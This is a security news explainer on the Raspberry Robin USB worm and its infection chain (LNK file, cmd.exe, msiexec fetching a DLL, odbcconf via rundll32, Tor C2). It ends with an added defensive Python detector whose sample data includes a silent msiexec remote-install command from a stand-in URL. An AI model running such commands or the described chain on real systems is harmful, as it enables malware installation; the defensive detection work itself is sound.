A new Microsoft Windows malware with worm-like capabilities has been discovered by security researchers; it spreads via removable USB devices containing a malicious .LNK file.
What is Raspberry Robin?
Raspberry Robin is a Windows worm which propagates through removable USB devices. It was first spotted in September 2021 by cybersecurity researchers from Red Canary. The experts observed that the malware was targeted at organisations in the technology and manufacturing industries.
Microsoft has spotted this Windows worm in the networks of hundreds of organisations and has observed the malware connecting to addresses on the Tor network. It has also been observed bypassing User Account Control (UAC) on infected systems using legitimate Windows tools.
Raspberry Robin worm infection flow
Infected USB drive attached
Raspberry Robin is typically introduced by infected removable drives - such as USB devices - containing a malicious .LNK file pretending to be a legitimate folder.
cmd.exe and msiexec.exe commands
When the user clicks the .LNK file, the worm spawns: cmd.exe reads and executes a malicious file stored on the infected device. Then msiexec.exe (the command-line Windows Installer component) attempts to connect to a short URL (often QNAP-associated).
Malicious .DLL download
If the external msiexec.exe connection is successful, it downloads and installs a malicious .DLL.
Rundll32.exe and Windows utility misuse
Rundll32.exe launches a legitimate Windows utility such as odbcconf.exe (a tool for configuring ODBC drivers) to execute the malicious .DLL.
Ongoing command and control activity
regsvr32.exe, rundll32.exe, and dllhost.exe repeatedly attempt outbound network connections, typically to Tor nodes.
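As an added example (not code from the original article or from the researchers it cites), the following Python checks two steps of the flow above, cmd.exe spawning msiexec.exe with a URL on its command line and rundll32.exe spawning odbcconf.exe, against constructed Sysmon-style process-creation records; the field names follow Sysmon Event ID 1 and the sample values are assumptions.

```python
"""Added example, not from the original article: flag the Raspberry Robin
process chain in constructed Sysmon-style process-creation records.
Field names mirror Sysmon Event ID 1 (Image, ParentImage, CommandLine)."""
import re
from typing import Dict, List, Tuple

URL_RE = re.compile(r"https?://", re.IGNORECASE)


def basename(path: str) -> str:
    """Return the lower-cased file name of a Windows path (or bare name)."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(event: Dict[str, str]) -> List[str]:
    """Return the names of every detection rule the event matches."""
    image = basename(event.get("Image", ""))
    parent = basename(event.get("ParentImage", ""))
    cmd = event.get("CommandLine", "")
    hits: List[str] = []
    # Flow step 2: cmd.exe launches msiexec.exe, which fetches a package
    # from a URL rather than installing a local .msi file.
    if image == "msiexec.exe" and parent == "cmd.exe" and URL_RE.search(cmd):
        hits.append("msiexec_remote_install_from_cmd")
    # Flow step 4: rundll32.exe launches odbcconf.exe to run a DLL.
    if image == "odbcconf.exe" and parent == "rundll32.exe":
        hits.append("rundll32_spawns_odbcconf")
    return hits


def scan(events: List[Dict[str, str]]) -> List[Tuple[int, str]]:
    """Return (event index, rule name) pairs for every matching event."""
    return [(i, rule) for i, ev in enumerate(events) for rule in classify(ev)]


# Constructed sample events (assumed values): events 0 and 2 are suspicious,
# event 1 is a normal local installer run from Explorer.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\msiexec.exe",
     "CommandLine": "msiexec /q /i http://short-url.invalid/pkg"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\msiexec.exe",
     "CommandLine": r"msiexec /i C:\Users\user\Downloads\setup.msi"},
    {"ParentImage": r"C:\Windows\System32\rundll32.exe",
     "Image": r"C:\Windows\System32\odbcconf.exe",
     "CommandLine": "odbcconf.exe (constructed placeholder arguments)"},
]

if __name__ == "__main__":
    for index, rule in scan(SAMPLE_EVENTS):
        print(f"event {index}: {rule}")  # prints events 0 and 2
```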
Raspberry Robin has been spotted in the wild by security researchers. They are still working to determine the operators' end goal and have yet to attribute the malware to a threat group. Some findings related to Raspberry Robin are shared on VirusTotal.